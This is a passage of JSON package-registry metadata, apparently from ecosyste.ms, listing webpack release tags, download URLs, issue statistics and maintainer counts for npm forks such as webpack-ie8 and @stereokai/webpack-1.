s/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-27T06:58:40.038Z","dependent_packages_count":1,"downloads":8,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":50.507620471597235,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":16.436491993261757},"purl":"pkg:npm/webpack-ie8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-ie8","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-ie8","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-ie8/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-ie8/codemeta","maintainers":[{"uuid":"webpatch","login":"webpatch","name":null,"email":"webpatch@sina.com","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~webpatch","role":null,"created_at":"2022-11-15T10:40:07.524Z","updated_at":"2022-11-15T10:40:07.524Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/webpatch/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1295980,"name":"@stereokai/webpack-1","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"stereokai","versions_count":1,"first_release_published_at":"2017-11-07T13:02:25.862Z","latest_release_published_at":"2017-11-07T13:02:25.862Z","latest_release_number":"1.14.0","last_synced_at":"2026-09-03T00:23:23.139Z","created_at":"2022-04-08T19:58:41.443Z","updated_at":"2026-09-03T00:23:23.139Z","registry_url":"https://www.npmjs.com/package/@stereokai/webpack-1","install_command":"npm install @stereokai/webpack-1","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.14.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026